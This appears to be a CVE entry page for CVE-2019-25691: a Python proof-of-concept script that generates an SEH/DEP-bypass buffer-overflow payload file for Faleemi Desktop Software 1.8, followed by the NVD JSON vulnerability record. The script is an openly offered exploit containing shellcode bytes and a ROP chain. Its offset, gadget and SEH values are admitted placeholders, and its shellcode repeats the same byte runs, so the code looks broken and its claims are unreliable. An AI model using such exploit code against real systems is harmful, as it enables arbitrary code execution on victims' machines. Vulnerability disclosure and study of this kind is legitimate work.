CVE-2019-25691

#!/usr/bin/env python # -*- coding: utf-8 -*- """ PoC for CVE-2019-25691 Faleemi Desktop Software 1.8 Local Buffer Overflow (SEH/DEP Bypass) This script generates a malicious payload to trigger the buffer overflow. """ import sys # Bad characters that might corrupt the payload (example) bad_chars = b"\x00\x0a\x0d" # 1. Offset to overwrite SEH handler (Example value, needs debugging) offset = 0 # 2. SEH Handler address (POP POP RET instruction) # This address must point to a non-ASLR module with safe SEH handling seh_handler = b"\xAF\x11\x50\x62" # Placeholder address # 3. Short jump to payload (nops + shellcode) short_jump = b"\xEB\x06\x90\x90" # 4. ROP Chain to bypass DEP # This is a generic representation. Real addresses depend on loaded modules. rop_chain = b"" rop_chain += b"\xAA\xAA\xAA\xAA" # Pivot gadget rop_chain += b"\xBB\xBB\xBB\xBB" # VirtualProtect call rop_chain += b"\xCC\xCC\xCC\xCC" # Parameters # 5. Payload (Calc.exe or MSFVenom shellcode) # msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python shellcode = b"" shellcode += b"\xd4\xc3\xb3\x9e\x2b\xc9\xb1\x33\xd9\xcb\xba\x7b\xd9\x74" shellcode += b"\x24\xf4\x5e\x31\x56\x13\x83\xc6\x04\x03\x56\xf8\x76\x8a" shellcode += b"\x34\x46\x9c\x8c\x7b\x52\x54\x53\x4a\x15\x03\x51\xb8\x3c" shellcode += b"\x4c\x93\x4d\x9c\x9e\x98\x4c\x62\x1a\x7b\xc7\x63\x6b\x09" shellcode += b"\xa2\x7b\x4f\xe6\xc9\x34\x19\x78\x3b\x53\x3a\x63\x82\x2e" shellcode += b"\x6c\x4a\x15\xcb\x45\xc2\x4a\x15\xb8\x3f\x2e\x6c\x4a\x15" shellcode += b"\xcb\x45\x8a\x34\x46\x9c\x8c\x7b\x52\x54\x53\x4a\x15\x03" shellcode += b"\x51\xb8\x3c\x4c\x93\x4d\x9c\x9e\x98\x4c\x62\x1a\x7b\xc7" shellcode += b"\x63\x6b\x09\xa2\x7b\x4f\xe6\xc9\x34\x19\x78\x3b\x53\x3a" shellcode += b"\x63\x82\x2e\x6c\x4a\x15\xcb\x45\xc2\x4a\x15\xb8\x3f\x2e" shellcode += b"\x6c\x4a\x15\xcb\x45" # Padding to align the payload padding = b"\x90" * 20 # Construct final buffer buffer = b"A" * offset buffer += seh_handler buffer += short_jump buffer += rop_chain buffer += padding buffer += shellcode buffer += b"C" * (3000 - len(buffer)) try: with open("CVE-2019-25691_PoC.txt", "wb") as f: f.write(buffer) print("[+] Payload generated successfully: CVE-2019-25691_PoC.txt") print(f"[+] Payload length: {len(buffer)} bytes") except Exception as e: print(f"[-] Error generating payload: {e}")

{"cve": {"id": "CVE-2019-25691", "sourceIdentifier": "[email protected]", "published": "2026-04-12T13:16:32.103", "lastModified": "2026-04-15T15:00:32.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Record file field to trigger a buffer overflow and execute arbitrary code via ROP chain gadgets."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46269", "source": "[email protected]"}, {"url": "https://www.faleemi.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/faleemi-desktop-software-local-buffer-overflow-seh-dep-bypass", "source": "[email protected]"}]}}